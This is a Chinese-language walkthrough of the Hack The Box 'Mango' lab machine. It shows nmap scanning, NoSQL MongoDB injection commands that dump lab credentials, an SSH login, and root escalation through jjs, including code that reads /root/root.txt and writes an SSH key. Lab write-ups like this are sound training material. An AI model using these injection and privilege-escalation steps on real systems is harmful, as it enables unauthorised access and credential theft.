HTB Mango的滲透測試實(shí)例
發(fā)布時(shí)間:2021-08-23 15:12
來(lái)源:億速云
閱讀:0
作者:chen
欄目: 網(wǎng)絡(luò )安全
這篇文章主要講解了“HTB Mango的滲透測試實(shí)例”�,文中的講解內容簡(jiǎn)單清晰��,易于學(xué)習與理解�,下面請大家跟著(zhù)小編的思路慢慢深入����,一起來(lái)研究和學(xué)習“HTB Mango的滲透測試實(shí)例”吧���!
前言
本次演練使用kali系統按照滲透測試的過(guò)程進(jìn)行操作����,通過(guò)前期的信息收集與普通注入不能獲取到有用的信息���,通過(guò)谷歌諸侯知道���,可以利用 --injection爬取賬號與密碼�����,使用ssh遠程連接獲取user.txt最終通過(guò)提權獲取root.txt���。
一��、信息收集
1�、靶機ip
ip地址為:10.129.1.219
2����、靶機端口與服務(wù)
nmap -sV -A -O 10.129.1.219
獲取到開(kāi)放端口與版本信息并且獲得了正在使用的域名信息
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
查看80與443端口
發(fā)現443端口是一個(gè)類(lèi)似于谷歌的搜索界面通過(guò)證書(shū)獲得一些信息
二����、漏洞探測與利用
Nosql-MongoDB-injection
將重點(diǎn)放在80端口�,這個(gè)端口是一個(gè)登錄界面��,經(jīng)過(guò)嘗試通過(guò)普通的sql注入無(wú)法爬取到有用的信息
通過(guò)谷歌發(fā)現存在Nosql-MongoDB-injection可以利用腳本進(jìn)行注入嘗試獲取賬號與密碼
鏈接:https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep username -op login:login,submit:submit
python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -ep password -op login:login,submit:submit
用戶(hù):admin 密碼:t9KcS3>!0B#2
用戶(hù):mango 密碼:h4mXK8RhU~f{]f5H
使用獲得的賬號密碼進(jìn)行登錄
無(wú)論使用哪一個(gè)都會(huì )跳轉到這個(gè)界面
通過(guò)ssh進(jìn)行遠程連接 并跳轉到admin用戶(hù)��,否則無(wú)法查看到admin文件夾下的user.txt
三��、提權
獲取交互式shell
python -c 'import pty;pty.spawn("/bin/bash")'使用LinEnum.sh查看是否存在可利用信息
最終根據提示找到了jjs可以利用jjs進(jìn)行提權
使用GTFOBins 查看可利用腳本
鏈接:https://gtfobins.github.io/
(1) 通過(guò)運行文件讀取命令直接獲得root.txt
var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }(2) 通過(guò)jjs上傳我們自己生成的ssh公鑰然后使用我們自己的私鑰進(jìn)行連接獲取root權限
ssh-keygen
完善腳本信息
echo 'var FileWriter = Java.type("java.io.FileWriter");
var fw=new FileWriter("./file_to_write");
fw.write("DATA");
fw.close();' | jjs在獲取的shell中執行腳本最后在kali中進(jìn)行登錄獲取root權限
